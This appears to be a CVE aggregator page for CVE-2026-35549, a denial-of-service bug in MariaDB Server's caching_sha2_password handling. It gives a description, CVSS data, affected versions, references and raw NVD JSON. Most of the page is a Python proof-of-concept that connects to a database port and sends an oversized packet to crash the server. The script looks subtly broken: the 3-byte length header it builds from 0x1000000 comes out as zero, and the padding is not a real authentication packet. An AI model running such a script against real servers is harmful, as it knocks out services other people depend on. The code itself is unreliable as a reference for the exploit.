CVE-2026-35549

Description

An issue was discovered in MariaDB Server before 11.4.10, 11.5.x through 11.8.x before 11.8.6, and 12.x before 12.2.2. If the caching_sha2_password authentication plugin is installed, and some user accounts are configured to use it, a large packet can crash the server because sha256_crypt_r uses alloca.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

MariaDB Server < 11.4.10

MariaDB Server 11.5.x - 11.8.x < 11.8.6

MariaDB Server 12.x < 12.2.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

# PoC for CVE-2026-35549
# Target: MariaDB Server with caching_sha2_password enabled
# Description: Sends a large packet to trigger stack exhaustion in sha256_crypt_r via alloca()

def send_malicious_packet(host, port):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((host, port))
        
        # Receive initial handshake packet
        packet = sock.recv(4096)
        
        # Construct a large authentication packet
        # The size needs to be large enough to blow the stack via alloca()
        # Example size: 16MB
        large_size = 0x1000000 
        
        # MySQL Packet Header: Length (3 bytes) + Sequence (1 byte)
        header = struct.pack('<I', large_size)[0:3] + bytes([1])
        
        # Payload: Padding 'A's
        payload = b'A' * large_size
        
        full_packet = header + payload
        
        print(f"Sending packet of size: {len(full_packet)}")
        sock.send(full_packet)
        
        # Server should crash here
        print("Packet sent. Check server status.")
        
    except Exception as e:
        print(f"Exception occurred: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    target_host = "127.0.0.1"
    target_port = 3306
    send_malicious_packet(target_host, target_port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35549
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35549
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35549/
[4] VulDB https://vuldb.com/cve/CVE-2026-35549
[5] https://jira.mariadb.org/browse/MDEV-38365

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35549", "sourceIdentifier": "[email protected]", "published": "2026-04-03T05:16:23.160", "lastModified": "2026-04-03T16:10:23.730", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in MariaDB Server before 11.4.10, 11.5.x through 11.8.x before 11.8.6, and 12.x before 12.2.2. If the caching_sha2_password authentication plugin is installed, and some user accounts are configured to use it, a large packet can crash the server because sha256_crypt_r uses alloca."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-789"}]}], "references": [{"url": "https://jira.mariadb.org/browse/MDEV-38365", "source": "[email protected]"}]}}